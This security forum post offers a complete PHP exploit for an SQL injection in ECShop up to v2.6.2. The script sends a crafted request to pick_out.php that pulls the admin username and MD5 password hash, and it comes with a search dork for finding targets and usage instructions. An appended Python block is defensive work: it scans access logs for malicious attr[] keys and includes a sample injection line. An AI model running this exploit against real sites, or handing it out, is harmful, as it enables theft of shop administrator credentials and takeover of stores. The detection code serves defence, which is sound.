[Bug & Security & Patches] [bug] ECShop <= v2.6.2 SQL injection / admin credentials

```php
#!/usr/bin/php
<?php
// This program is for technical exchange only; do not use it for illegal purposes!!
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
 * works with magic_quotes_gpc = Off
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);

if ($hash)
    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
    exit("Exploit Failed!\n");

function send()
{
    global $host, $path;

    $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';

    $data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: Close\r\n\r\n";

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
```
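A defensive counterpart to the script above, added here and not part of the original post: the injected SQL travels in the array key of the `attr[...]` parameter sent to pick_out.php, so web-server access logs can be screened for `attr` keys that are not plain integers. The log lines are constructed samples, and the premise that legitimate keys are numeric attribute IDs is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter name of the form attr[<key>], after URL decoding.
ATTR_RE = re.compile(r"attr\[(.*)\]", re.S)

# Constructed sample log lines (documentation IP range, made-up paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /ecshop/pick_out.php?cat_id=3&attr[172]=red HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /ecshop/pick_out.php?cat_id=999999&attr[%27%20UNION%20SELECT%201%23]=x HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /ecshop/pick_out.php?attr%5B1%20OR%201%5D=x HTTP/1.1" 200 790',
    '203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /ecshop/index.php?attr[abc]=1 HTTP/1.1" 200 4096',
]

def suspicious_attr_keys(line):
    """Return decoded attr[] keys that are not plain integers (pick_out.php only)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/pick_out.php"):
        return []
    bad = []
    for pair in url.query.split("&"):
        # Like PHP, split on the first literal '=' and decode the name afterwards,
        # so encoded brackets (%5B/%5D) and an encoded '=' inside the key are handled.
        name = unquote(pair.split("=", 1)[0].replace("+", " "))
        km = ATTR_RE.fullmatch(name)
        if km and not re.fullmatch(r"[0-9]+", km.group(1)):
            bad.append(km.group(1))
    return bad

def scan(lines):
    """Return (client_ip, bad_keys) for every line with a suspicious key."""
    hits = []
    for line in lines:
        keys = suspicious_attr_keys(line)
        if keys:
            hits.append((line.split(" ", 1)[0], keys))
    return hits

if __name__ == "__main__":
    for ip, keys in scan(SAMPLE_LOG):
        print(ip, keys)
```
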

